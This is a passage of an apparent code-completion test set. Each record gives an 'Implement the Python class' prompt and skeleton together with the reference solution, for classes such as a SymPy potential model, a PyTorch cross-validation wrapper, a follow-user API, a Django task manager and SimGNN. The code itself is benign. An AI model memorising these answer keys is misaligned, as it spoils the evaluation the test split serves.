tuple((symutil.make_function(name, *self.εs) for name in ('exx', 'eyy', 'ezz', 'eyz', 'ezx', 'exy')))\n\n def dφdq(self, qs, strip):\n \"\"\"Differentiate the potential ϕ w.r.t. given independent variables. self.indepvars.keys() contains all valid independent variables. If ϕ is a layer cake of SymPy applied functions, the chain rule is applied automatically. Parameters: qs: tuple of str Names of independent variables to differentiate with regard to. Use an empty tuple to skip differentiation and get just ϕ itself. strip: bool See return value for definitions of ``sym`` and ``expr``. If True, pass expr through ``symutil.strip_function_arguments()`` before returning it, replacing applied functions with bare symbols. If False, return expr as-is. sym is always keyify()'d to make it a definition key. Example: m = Model() m.dϕdq((\"Bx\",\"\"\"\n invalid_inputs = [q for q in qs if q not in self.indepvars]\n if len(invalid_inputs):\n raise ValueError('Variable(s) {invalid} not in self.indepvars'.format(invalid=', '.join(invalid_inputs)))\n sym = symutil.make_function('ϕ', *self.indepvars.values())\n expr = self.φ\n for varname in qs:\n q = self.indepvars[varname]\n sym = sy.diff(sym, q, evaluate=False)\n expr = sy.diff(expr, q)\n sym = self.keyify(sym)\n if len(qs):\n expr = symutil.apply_substitutions_in(expr)\n if strip:\n expr = symutil.strip_function_arguments(expr)\n assert sym != 0, 'BUG in dϕdq(): symbol for function name is 0'\n return (sym, expr)\n\n def dφdqs(self, jacobian=True, hessian=True):\n \"\"\"Return 1st and 2nd derivatives of ϕ w.r.t. all independent variables. Convenience function. This is essentially a loop over ``dϕdq()``, to differentiate self.ϕ symbolically. If ϕ is a layer cake of SymPy applied functions, it will be differentiated only formally (using the chain rule), without inserting any definitions. This is convenient, since by keeping the functional relations intact we avoid generating (possibly lengthy) common subexpressions. (stage2 takes care of actually calling the functions to obtain the necessary values at each step of evaluating the RHS.) Parameters: jacobian: bool Compute first derivatives. hessian: bool Compute second derivatives. Returns: dict(sy.Symbol -> sy.\"\"\"\n ivars = sorted(self.indepvars.keys())\n out = {}\n allqs = []\n if jacobian:\n allqs.extend(((var,) for var in ivars))\n if hessian:\n allqs.extend(combinations_with_replacement(ivars, 2))\n for i, qs in enumerate(allqs, start=1):\n print('model: {label} ({iteration:d}/{total:d}) forming expression for {name}'.format(label=self.label, iteration=i, total=len(allqs), name=util.name_derivative('ϕ', qs)))\n sym, expr = self.dφdq(qs, strip=False)\n out[sym] = expr\n return out\n\n def simplify(self, expr):\n \"\"\"Simplify expr. Specifically geared to optimize expressions treated by this class.\"\"\"\n expr = recursive_collect(sy.together(sy.expand(expr)))\n expr = recursive_collect(expr, syms=self.Bs)\n expr = symutil.collect_const_in(expr)\n return expr\n", "source": "the_stack_v2_python_sparse", "source_path": "potentialmodelbase.py", "source_repo": "TUTElectromechanics/mm-codegen", "split": "test", "star_events_count": 2} {"blob_id": "e35296fdfba9054950bdc5af8628adc9e619d210", "bodies": ["assert cv_iters > 2, 'Cross validation folds must be more than 2 folds'\nself.cv_iters = cv_iters\ndatapath = './Data'\nself.dataset = [[os.path.join(os.path.join(os.path.join(datapath, folder), label), image), int(label)] for folder in os.listdir(datapath) for label in os.listdir(os.path.join(datapath, folder)) for image in os.listdir(os.path.join(os.path.join(datapath, folder), label))]\nself.Ind = np.arange(len(self.dataset))\nself.shuffle()", "random.seed(231)\nrandom.shuffle(self.Ind)\nself.Ind = self.Ind[:int(len(self.Ind) / 5) * 5].reshape((self.cv_iters, -1))\nself.CVindex = 1\nself.Testindex = 0", "next_test = False\nif self.CVindex < self.cv_iters - 1:\n self.CVindex += 1\n if self.Testindex < self.cv_iters - 1:\n if self.Testindex == self.CVindex:\n self.CVindex += 1\n elif self.Testindex == self.CVindex:\n self.CVindex = 0\n next_test = True\nelse:\n self.CVindex = 0\n next_test = True\nif next_test:\n if self.Testindex < self.cv_iters - 1:\n self.Testindex += 1\n else:\n self.Testindex = 0\n self.CVindex = 1"], "bodies_text": "<|body_start_0|>\n assert cv_iters > 2, 'Cross validation folds must be more than 2 folds'\n self.cv_iters = cv_iters\n datapath = './Data'\n self.dataset = [[os.path.join(os.path.join(os.path.join(datapath, folder), label), image), int(label)] for folder in os.listdir(datapath) for label in os.listdir(os.path.join(datapath, folder)) for image in os.listdir(os.path.join(os.path.join(datapath, folder), label))]\n self.Ind = np.arange(len(self.dataset))\n self.shuffle()\n<|end_body_0|>\n\n<|body_start_1|>\n random.seed(231)\n random.shuffle(self.Ind)\n self.Ind = self.Ind[:int(len(self.Ind) / 5) * 5].reshape((self.cv_iters, -1))\n self.CVindex = 1\n self.Testindex = 0\n<|end_body_1|>\n\n<|body_start_2|>\n next_test = False\n if self.CVindex < self.cv_iters - 1:\n self.CVindex += 1\n if self.Testindex < self.cv_iters - 1:\n if self.Testindex == self.CVindex:\n self.CVindex += 1\n elif self.Testindex == self.CVindex:\n self.CVindex = 0\n next_test = True\n else:\n self.CVindex = 0\n next_test = True\n if next_test:\n if self.Testindex < self.cv_iters - 1:\n self.Testindex += 1\n else:\n self.Testindex = 0\n self.CVindex = 1\n<|end_body_2|>\n", "class_docstring": "A standard PyTorch definition of Dataset which defines the functions __len__ and __getitem__.", "class_name": "__DatasetWrapper", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass __DatasetWrapper:\n \"\"\"A standard PyTorch definition of Dataset which defines the functions __len__ and __getitem__.\"\"\"\n\n def __init__(self, cv_iters):\n \"\"\"create df for features and labels remove samples that are not shared between the two tables\"\"\"\n <|body_0|>\n\n def shuffle(self):\n \"\"\"categorize sample ID by label\"\"\"\n <|body_1|>\n\n def next(self):\n \"\"\"rotate to the next cross validation process\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert cv_iters > 2, 'Cross validation folds must be more than 2 folds'\n self.cv_iters = cv_iters\n datapath = './Data'\n self.dataset = [[os.path.join(os.path.join(os.path.join(datapath, folder), label), image), int(label)] for folder in os.listdir(datapath) for label in os.listdir(os.path.join(datapath, folder)) for image in os.listdir(os.path.join(os.path.join(datapath, folder), label))]\n self.Ind = np.arange(len(self.dataset))\n self.shuffle()\n<|end_body_0|>\n\n<|body_start_1|>\n random.seed(231)\n random.shuffle(self.Ind)\n self.Ind = self.Ind[:int(len(self.Ind) / 5) * 5].reshape((self.cv_iters, -1))\n self.CVindex = 1\n self.Testindex = 0\n<|end_body_1|>\n\n<|body_start_2|>\n next_test = False\n if self.CVindex < self.cv_iters - 1:\n self.CVindex += 1\n if self.Testindex < self.cv_iters - 1:\n if self.Testindex == self.CVindex:\n self.CVindex += 1\n elif self.Testindex == self.CVindex:\n self.CVindex = 0\n next_test = True\n else:\n self.CVindex = 0\n next_test = True\n if next_test:\n if self.Testindex < self.cv_iters - 1:\n self.Testindex += 1\n else:\n self.Testindex = 0\n self.CVindex = 1\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000334", "length_bytes": 5905, "license_type": "no_license", "methods": [{"docstring": "create df for features and labels remove samples that are not shared between the two tables", "name": "__init__", "signature": "def __init__(self, cv_iters)"}, {"docstring": "categorize sample ID by label", "name": "shuffle", "signature": "def shuffle(self)"}, {"docstring": "rotate to the next cross validation process", "name": "next", "signature": "def next(self)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_val_000310", "prompt": "Implement the Python class `__DatasetWrapper` described below.\n\nClass description:\nA standard PyTorch definition of Dataset which defines the functions __len__ and __getitem__.\n\nMethod signatures and docstrings:\n- def __init__(self, cv_iters): create df for features and labels remove samples that are not shared between the two tables\n- def shuffle(self): categorize sample ID by label\n- def next(self): rotate to the next cross validation process", "prompted_full_text": "Implement the Python class `__DatasetWrapper` described below.\n\nClass description:\nA standard PyTorch definition of Dataset which defines the functions __len__ and __getitem__.\n\nMethod signatures and docstrings:\n- def __init__(self, cv_iters): create df for features and labels remove samples that are not shared between the two tables\n- def shuffle(self): categorize sample ID by label\n- def next(self): rotate to the next cross validation process\n\n<|skeleton|>\nclass __DatasetWrapper:\n \"\"\"A standard PyTorch definition of Dataset which defines the functions __len__ and __getitem__.\"\"\"\n\n def __init__(self, cv_iters):\n \"\"\"create df for features and labels remove samples that are not shared between the two tables\"\"\"\n <|body_0|>\n\n def shuffle(self):\n \"\"\"categorize sample ID by label\"\"\"\n <|body_1|>\n\n def next(self):\n \"\"\"rotate to the next cross validation process\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert cv_iters > 2, 'Cross validation folds must be more than 2 folds'\n self.cv_iters = cv_iters\n datapath = './Data'\n self.dataset = [[os.path.join(os.path.join(os.path.join(datapath, folder), label), image), int(label)] for folder in os.listdir(datapath) for label in os.listdir(os.path.join(datapath, folder)) for image in os.listdir(os.path.join(os.path.join(datapath, folder), label))]\n self.Ind = np.arange(len(self.dataset))\n self.shuffle()\n<|end_body_0|>\n\n<|body_start_1|>\n random.seed(231)\n random.shuffle(self.Ind)\n self.Ind = self.Ind[:int(len(self.Ind) / 5) * 5].reshape((self.cv_iters, -1))\n self.CVindex = 1\n self.Testindex = 0\n<|end_body_1|>\n\n<|body_start_2|>\n next_test = False\n if self.CVindex < self.cv_iters - 1:\n self.CVindex += 1\n if self.Testindex < self.cv_iters - 1:\n if self.Testindex == self.CVindex:\n self.CVindex += 1\n elif self.Testindex == self.CVindex:\n self.CVindex = 0\n next_test = True\n else:\n self.CVindex = 0\n next_test = True\n if next_test:\n if self.Testindex < self.cv_iters - 1:\n self.Testindex += 1\n else:\n self.Testindex = 0\n self.CVindex = 1\n<|end_body_2|>\n", "revision_id": "9a959ceeaa44c6d5a4d051e76862f5f7ab65e54b", "skeleton": "<|skeleton|>\nclass __DatasetWrapper:\n \"\"\"A standard PyTorch definition of Dataset which defines the functions __len__ and __getitem__.\"\"\"\n\n def __init__(self, cv_iters):\n \"\"\"create df for features and labels remove samples that are not shared between the two tables\"\"\"\n <|body_0|>\n\n def shuffle(self):\n \"\"\"categorize sample ID by label\"\"\"\n <|body_1|>\n\n def next(self):\n \"\"\"rotate to the next cross validation process\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class __DatasetWrapper:\n \"\"\"A standard PyTorch definition of Dataset which defines the functions __len__ and __getitem__.\"\"\"\n\n def __init__(self, cv_iters):\n \"\"\"create df for features and labels remove samples that are not shared between the two tables\"\"\"\n assert cv_iters > 2, 'Cross validation folds must be more than 2 folds'\n self.cv_iters = cv_iters\n datapath = './Data'\n self.dataset = [[os.path.join(os.path.join(os.path.join(datapath, folder), label), image), int(label)] for folder in os.listdir(datapath) for label in os.listdir(os.path.join(datapath, folder)) for image in os.listdir(os.path.join(os.path.join(datapath, folder), label))]\n self.Ind = np.arange(len(self.dataset))\n self.shuffle()\n\n def shuffle(self):\n \"\"\"categorize sample ID by label\"\"\"\n random.seed(231)\n random.shuffle(self.Ind)\n self.Ind = self.Ind[:int(len(self.Ind) / 5) * 5].reshape((self.cv_iters, -1))\n self.CVindex = 1\n self.Testindex = 0\n\n def next(self):\n \"\"\"rotate to the next cross validation process\"\"\"\n next_test = False\n if self.CVindex < self.cv_iters - 1:\n self.CVindex += 1\n if self.Testindex < self.cv_iters - 1:\n if self.Testindex == self.CVindex:\n self.CVindex += 1\n elif self.Testindex == self.CVindex:\n self.CVindex = 0\n next_test = True\n else:\n self.CVindex = 0\n next_test = True\n if next_test:\n if self.Testindex < self.cv_iters - 1:\n self.Testindex += 1\n else:\n self.Testindex = 0\n self.CVindex = 1\n", "source": "the_stack_v2_python_sparse", "source_path": "data_loader.py", "source_repo": "Bozhao-Liu/Kaggle-breast-cancer-autoencoder", "split": "test", "star_events_count": 1} {"blob_id": "88ee99fcf4634f8a3631379788692d568c5c8ac6", "bodies": ["follow_user = self.db.query(FollowUser).filter_by(src_user_id=self.current_user).filter_by(dst_user_id=user_id).filter(FollowUser.is_current()).first()\nif follow_user:\n self.set_status(409)\nelse:\n self.db.add(FollowUser(src_user_id=self.current_user, dst_user_id=user_id))\nself.db.commit()\nself.finish()", "follow_user = self.db.query(FollowUser).filter_by(src_user_id=self.current_user).filter_by(dst_user_id=user_id).filter(FollowUser.is_current()).first()\nif follow_user:\n follow_user.stop()\nelse:\n self.set_status(404)\nself.db.commit()\nself.finish()"], "bodies_text": "<|body_start_0|>\n follow_user = self.db.query(FollowUser).filter_by(src_user_id=self.current_user).filter_by(dst_user_id=user_id).filter(FollowUser.is_current()).first()\n if follow_user:\n self.set_status(409)\n else:\n self.db.add(FollowUser(src_user_id=self.current_user, dst_user_id=user_id))\n self.db.commit()\n self.finish()\n<|end_body_0|>\n\n<|body_start_1|>\n follow_user = self.db.query(FollowUser).filter_by(src_user_id=self.current_user).filter_by(dst_user_id=user_id).filter(FollowUser.is_current()).first()\n if follow_user:\n follow_user.stop()\n else:\n self.set_status(404)\n self.db.commit()\n self.finish()\n<|end_body_1|>\n", "class_docstring": "", "class_name": "API_FollowUser", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass API_FollowUser:\n\n def post(self, user_id):\n \"\"\"start following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 409: already subscribed BODY: empty\"\"\"\n <|body_0|>\n\n def delete(self, user_id):\n \"\"\"stop following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 404: current_user isn't subscribed on dst_user_id BODY: empty\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n follow_user = self.db.query(FollowUser).filter_by(src_user_id=self.current_user).filter_by(dst_user_id=user_id).filter(FollowUser.is_current()).first()\n if follow_user:\n self.set_status(409)\n else:\n self.db.add(FollowUser(src_user_id=self.current_user, dst_user_id=user_id))\n self.db.commit()\n self.finish()\n<|end_body_0|>\n\n<|body_start_1|>\n follow_user = self.db.query(FollowUser).filter_by(src_user_id=self.current_user).filter_by(dst_user_id=user_id).filter(FollowUser.is_current()).first()\n if follow_user:\n follow_user.stop()\n else:\n self.set_status(404)\n self.db.commit()\n self.finish()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000335", "length_bytes": 7114, "license_type": "no_license", "methods": [{"docstring": "start following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 409: already subscribed BODY: empty", "name": "post", "signature": "def post(self, user_id)"}, {"docstring": "stop following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 404: current_user isn't subscribed on dst_user_id BODY: empty", "name": "delete", "signature": "def delete(self, user_id)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_005070", "prompt": "Implement the Python class `API_FollowUser` described below.\n\nClass description:\nImplement the API_FollowUser class.\n\nMethod signatures and docstrings:\n- def post(self, user_id): start following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 409: already subscribed BODY: empty\n- def delete(self, user_id): stop following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 404: current_user isn't subscribed on dst_user_id BODY: empty", "prompted_full_text": "Implement the Python class `API_FollowUser` described below.\n\nClass description:\nImplement the API_FollowUser class.\n\nMethod signatures and docstrings:\n- def post(self, user_id): start following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 409: already subscribed BODY: empty\n- def delete(self, user_id): stop following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 404: current_user isn't subscribed on dst_user_id BODY: empty\n\n<|skeleton|>\nclass API_FollowUser:\n\n def post(self, user_id):\n \"\"\"start following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 409: already subscribed BODY: empty\"\"\"\n <|body_0|>\n\n def delete(self, user_id):\n \"\"\"stop following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 404: current_user isn't subscribed on dst_user_id BODY: empty\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n follow_user = self.db.query(FollowUser).filter_by(src_user_id=self.current_user).filter_by(dst_user_id=user_id).filter(FollowUser.is_current()).first()\n if follow_user:\n self.set_status(409)\n else:\n self.db.add(FollowUser(src_user_id=self.current_user, dst_user_id=user_id))\n self.db.commit()\n self.finish()\n<|end_body_0|>\n\n<|body_start_1|>\n follow_user = self.db.query(FollowUser).filter_by(src_user_id=self.current_user).filter_by(dst_user_id=user_id).filter(FollowUser.is_current()).first()\n if follow_user:\n follow_user.stop()\n else:\n self.set_status(404)\n self.db.commit()\n self.finish()\n<|end_body_1|>\n", "revision_id": "0eab54eb283e7434734b9fbeabd7d3ba249772af", "skeleton": "<|skeleton|>\nclass API_FollowUser:\n\n def post(self, user_id):\n \"\"\"start following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 409: already subscribed BODY: empty\"\"\"\n <|body_0|>\n\n def delete(self, user_id):\n \"\"\"stop following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 404: current_user isn't subscribed on dst_user_id BODY: empty\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class API_FollowUser:\n def post(self, user_id):\n \"\"\"start following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 409: already subscribed BODY: empty\"\"\"\n follow_user = self.db.query(FollowUser).filter_by(src_user_id=self.current_user).filter_by(dst_user_id=user_id).filter(FollowUser.is_current()).first()\n if follow_user:\n self.set_status(409)\n else:\n self.db.add(FollowUser(src_user_id=self.current_user, dst_user_id=user_id))\n self.db.commit()\n self.finish()\n\n def delete(self, user_id):\n \"\"\"stop following user Parameters ---------- dst_user_id: int (required) Returns ---------- CODES: 200: OK 404: current_user isn't subscribed on dst_user_id BODY: empty\"\"\"\n follow_user = self.db.query(FollowUser).filter_by(src_user_id=self.current_user).filter_by(dst_user_id=user_id).filter(FollowUser.is_current()).first()\n if follow_user:\n follow_user.stop()\n else:\n self.set_status(404)\n self.db.commit()\n self.finish()\n", "source": "the_stack_v2_python_sparse", "source_path": "backend/main_app/api_v1/follow.py", "source_repo": "zzzevaka/findchat", "split": "test", "star_events_count": 0} {"blob_id": "7816e6a38f17d8cb8bdd627dc9d513edea5a4ead", "bodies": ["if not party.__class__ == GenericParty:\n party = GenericParty.objects.get(party=party)\nall_owned_tasks = super(TaskManager, self).filter(ownership__party=party, completed=False).select_related('ownership')\ntask_list = []\nfor task in all_owned_tasks:\n ownership = task.ownership.filter(party=party).latest('created')\n if not ownership.disown:\n task_list.append(task)\nreturn task_list", "user_privileges = get_privileges_for_user(user)\nqueryset = super(TaskManager, self).filter(access_requirements__prototype__privilege__in=user_privileges)\nreturn queryset"], "bodies_text": "<|body_start_0|>\n if not party.__class__ == GenericParty:\n party = GenericParty.objects.get(party=party)\n all_owned_tasks = super(TaskManager, self).filter(ownership__party=party, completed=False).select_related('ownership')\n task_list = []\n for task in all_owned_tasks:\n ownership = task.ownership.filter(party=party).latest('created')\n if not ownership.disown:\n task_list.append(task)\n return task_list\n<|end_body_0|>\n\n<|body_start_1|>\n user_privileges = get_privileges_for_user(user)\n queryset = super(TaskManager, self).filter(access_requirements__prototype__privilege__in=user_privileges)\n return queryset\n<|end_body_1|>\n", "class_docstring": "Adding a method to get tasks currently owned by a user or group.", "class_name": "TaskManager", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TaskManager:\n \"\"\"Adding a method to get tasks currently owned by a user or group.\"\"\"\n\n def filter_active_by_owner(self, party, *args, **kwargs):\n \"\"\"Takes a User, Group, or GenericParty and returns a list of tasks that are currently owned by them.\"\"\"\n <|body_0|>\n\n def can_be_seen_by_user(self, user, *args, **kwargs):\n \"\"\"Filters tasks that can be seen by a particular user. TODO: See if this can be optimized.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not party.__class__ == GenericParty:\n party = GenericParty.objects.get(party=party)\n all_owned_tasks = super(TaskManager, self).filter(ownership__party=party, completed=False).select_related('ownership')\n task_list = []\n for task in all_owned_tasks:\n ownership = task.ownership.filter(party=party).latest('created')\n if not ownership.disown:\n task_list.append(task)\n return task_list\n<|end_body_0|>\n\n<|body_start_1|>\n user_privileges = get_privileges_for_user(user)\n queryset = super(TaskManager, self).filter(access_requirements__prototype__privilege__in=user_privileges)\n return queryset\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000336", "length_bytes": 37716, "license_type": "permissive", "methods": [{"docstring": "Takes a User, Group, or GenericParty and returns a list of tasks that are currently owned by them.", "name": "filter_active_by_owner", "signature": "def filter_active_by_owner(self, party, *args, **kwargs)"}, {"docstring": "Filters tasks that can be seen by a particular user. TODO: See if this can be optimized.", "name": "can_be_seen_by_user", "signature": "def can_be_seen_by_user(self, user, *args, **kwargs)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003918", "prompt": "Implement the Python class `TaskManager` described below.\n\nClass description:\nAdding a method to get tasks currently owned by a user or group.\n\nMethod signatures and docstrings:\n- def filter_active_by_owner(self, party, *args, **kwargs): Takes a User, Group, or GenericParty and returns a list of tasks that are currently owned by them.\n- def can_be_seen_by_user(self, user, *args, **kwargs): Filters tasks that can be seen by a particular user. TODO: See if this can be optimized.", "prompted_full_text": "Implement the Python class `TaskManager` described below.\n\nClass description:\nAdding a method to get tasks currently owned by a user or group.\n\nMethod signatures and docstrings:\n- def filter_active_by_owner(self, party, *args, **kwargs): Takes a User, Group, or GenericParty and returns a list of tasks that are currently owned by them.\n- def can_be_seen_by_user(self, user, *args, **kwargs): Filters tasks that can be seen by a particular user. TODO: See if this can be optimized.\n\n<|skeleton|>\nclass TaskManager:\n \"\"\"Adding a method to get tasks currently owned by a user or group.\"\"\"\n\n def filter_active_by_owner(self, party, *args, **kwargs):\n \"\"\"Takes a User, Group, or GenericParty and returns a list of tasks that are currently owned by them.\"\"\"\n <|body_0|>\n\n def can_be_seen_by_user(self, user, *args, **kwargs):\n \"\"\"Filters tasks that can be seen by a particular user. TODO: See if this can be optimized.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not party.__class__ == GenericParty:\n party = GenericParty.objects.get(party=party)\n all_owned_tasks = super(TaskManager, self).filter(ownership__party=party, completed=False).select_related('ownership')\n task_list = []\n for task in all_owned_tasks:\n ownership = task.ownership.filter(party=party).latest('created')\n if not ownership.disown:\n task_list.append(task)\n return task_list\n<|end_body_0|>\n\n<|body_start_1|>\n user_privileges = get_privileges_for_user(user)\n queryset = super(TaskManager, self).filter(access_requirements__prototype__privilege__in=user_privileges)\n return queryset\n<|end_body_1|>\n", "revision_id": "69e78d01065142446234e77ea7c8c31e3482af29", "skeleton": "<|skeleton|>\nclass TaskManager:\n \"\"\"Adding a method to get tasks currently owned by a user or group.\"\"\"\n\n def filter_active_by_owner(self, party, *args, **kwargs):\n \"\"\"Takes a User, Group, or GenericParty and returns a list of tasks that are currently owned by them.\"\"\"\n <|body_0|>\n\n def can_be_seen_by_user(self, user, *args, **kwargs):\n \"\"\"Filters tasks that can be seen by a particular user. TODO: See if this can be optimized.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TaskManager:\n \"\"\"Adding a method to get tasks currently owned by a user or group.\"\"\"\n\n def filter_active_by_owner(self, party, *args, **kwargs):\n \"\"\"Takes a User, Group, or GenericParty and returns a list of tasks that are currently owned by them.\"\"\"\n if not party.__class__ == GenericParty:\n party = GenericParty.objects.get(party=party)\n all_owned_tasks = super(TaskManager, self).filter(ownership__party=party, completed=False).select_related('ownership')\n task_list = []\n for task in all_owned_tasks:\n ownership = task.ownership.filter(party=party).latest('created')\n if not ownership.disown:\n task_list.append(task)\n return task_list\n\n def can_be_seen_by_user(self, user, *args, **kwargs):\n \"\"\"Filters tasks that can be seen by a particular user. TODO: See if this can be optimized.\"\"\"\n user_privileges = get_privileges_for_user(user)\n queryset = super(TaskManager, self).filter(access_requirements__prototype__privilege__in=user_privileges)\n return queryset\n", "source": "the_stack_v2_python_sparse", "source_path": "what_apps/do/models.py", "source_repo": "jMyles/WHAT", "split": "test", "star_events_count": 0} {"blob_id": "9adc96bd7b6fdb25b973a79394ce1289b5c0300d", "bodies": ["super(SimGNN, self).__init__()\nself.args = args\nself.number_labels = number_of_labels\nself.setup_layers()", "if self.args.histogram == True:\n self.feature_count = self.args.tensor_neurons + self.args.bins\nelse:\n self.feature_count = self.args.tensor_neurons", "self.calculate_bottleneck_features()\nself.convolution_1 = GCNConv(self.number_labels, self.args.filters_1)\nself.convolution_2 = GCNConv(self.args.filters_1, self.args.filters_2)\nself.convolution_3 = GCNConv(self.args.filters_2, self.args.filters_3)\nself.attention = AttentionModule(self.args)\nself.tensor_network = TenorNetworkModule(self.args)\nself.fully_connected_first = torch.nn.Linear(self.feature_count, self.args.bottle_neck_neurons)\nself.scoring_layer = torch.nn.Linear(self.args.bottle_neck_neurons, 1)", "scores = torch.mm(abstract_features_1, abstract_features_2).detach()\nscores = scores.view(-1, 1)\nhist = torch.histc(scores, bins=self.args.bins)\nhist = hist / torch.sum(hist)\nhist = hist.view(1, -1)\nreturn hist", "features = self.convolution_1(features, edge_index)\nfeatures = torch.nn.functional.relu(features)\nfeatures = torch.nn.functional.dropout(features, p=self.args.dropout, training=self.training)\nfeatures = self.convolution_2(features, edge_index)\nfeatures = torch.nn.functional.relu(features)\nfeatures = torch.nn.functional.dropout(features, p=self.args.dropout, training=self.training)\nfeatures = self.convolution_3(features, edge_index)\nreturn features", "edge_index_1 = data['edge_index_1']\nedge_index_2 = data['edge_index_2']\nfeatures_1 = data['features_1']\nfeatures_2 = data['features_2']\nabstract_features_1 = self.convolutional_pass(edge_index_1, features_1)\nabstract_features_2 = self.convolutional_pass(edge_index_2, features_2)\nif self.args.histogram == True:\n hist = self.calculate_histogram(abstract_features_1, torch.t(abstract_features_2))\npooled_features_1 = self.attention(abstract_features_1)\npooled_features_2 = self.attention(abstract_features_2)\nscores = self.tensor_network(pooled_features_1, pooled_features_2)\nscores = torch.t(scores)\nif self.args.histogram == True:\n scores = torch.cat((scores, hist), dim=1).view(1, -1)\nscores = torch.nn.functional.relu(self.fully_connected_first(scores))\nscore = torch.sigmoid(self.scoring_layer(scores))\nreturn score"], "bodies_text": "<|body_start_0|>\n super(SimGNN, self).__init__()\n self.args = args\n self.number_labels = number_of_labels\n self.setup_layers()\n<|end_body_0|>\n\n<|body_start_1|>\n if self.args.histogram == True:\n self.feature_count = self.args.tensor_neurons + self.args.bins\n else:\n self.feature_count = self.args.tensor_neurons\n<|end_body_1|>\n\n<|body_start_2|>\n self.calculate_bottleneck_features()\n self.convolution_1 = GCNConv(self.number_labels, self.args.filters_1)\n self.convolution_2 = GCNConv(self.args.filters_1, self.args.filters_2)\n self.convolution_3 = GCNConv(self.args.filters_2, self.args.filters_3)\n self.attention = AttentionModule(self.args)\n self.tensor_network = TenorNetworkModule(self.args)\n self.fully_connected_first = torch.nn.Linear(self.feature_count, self.args.bottle_neck_neurons)\n self.scoring_layer = torch.nn.Linear(self.args.bottle_neck_neurons, 1)\n<|end_body_2|>\n\n<|body_start_3|>\n scores = torch.mm(abstract_features_1, abstract_features_2).detach()\n scores = scores.view(-1, 1)\n hist = torch.histc(scores, bins=self.args.bins)\n hist = hist / torch.sum(hist)\n hist = hist.view(1, -1)\n return hist\n<|end_body_3|>\n\n<|body_start_4|>\n features = self.convolution_1(features, edge_index)\n features = torch.nn.functional.relu(features)\n features = torch.nn.functional.dropout(features, p=self.args.dropout, training=self.training)\n features = self.convolution_2(features, edge_index)\n features = torch.nn.functional.relu(features)\n features = torch.nn.functional.dropout(features, p=self.args.dropout, training=self.training)\n features = self.convolution_3(features, edge_index)\n return features\n<|end_body_4|>\n\n<|body_start_5|>\n edge_index_1 = data['edge_index_1']\n edge_index_2 = data['edge_index_2']\n features_1 = data['features_1']\n features_2 = data['features_2']\n abstract_features_1 = self.convolutional_pass(edge_index_1, features_1)\n abstract_features_2 = self.convolutional_pass(edge_index_2, features_2)\n if self.args.histogram == True:\n hist = self.calculate_histogram(abstract_features_1, torch.t(abstract_features_2))\n pooled_features_1 = self.attention(abstract_features_1)\n pooled_features_2 = self.attention(abstract_features_2)\n scores = self.tensor_network(pooled_features_1, pooled_features_2)\n scores = torch.t(scores)\n if self.args.histogram == True:\n scores = torch.cat((scores, hist), dim=1).view(1, -1)\n scores = torch.nn.functional.relu(self.fully_connected_first(scores))\n score = torch.sigmoid(self.scoring_layer(scores))\n return score\n<|end_body_5|>\n", "class_docstring": "SimGNN: A Neural Network Approach to Fast Graph Similarity Computation https://arxiv.org/abs/1808.05689", "class_name": "SimGNN", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SimGNN:\n \"\"\"SimGNN: A Neural Network Approach to Fast Graph Similarity Computation https://arxiv.org/abs/1808.05689\"\"\"\n\n def __init__(self, args, number_of_labels):\n \"\"\":param args: Arguments object. :param number_of_labels: Number of node labels.\"\"\"\n <|body_0|>\n\n def calculate_bottleneck_features(self):\n \"\"\"Deciding the shape of the bottleneck layer.\"\"\"\n <|body_1|>\n\n def setup_layers(self):\n \"\"\"Creating the layers.\"\"\"\n <|body_2|>\n\n def calculate_histogram(self, abstract_features_1, abstract_features_2):\n \"\"\"Calculate histogram from similarity matrix. :param abstract_features_1: Feature matrix for graph 1. :param abstract_features_2: Feature matrix for graph 2. :return hist: Histsogram of similarity scores.\"\"\"\n <|body_3|>\n\n def convolutional_pass(self, edge_index, features):\n \"\"\"Making convolutional pass. 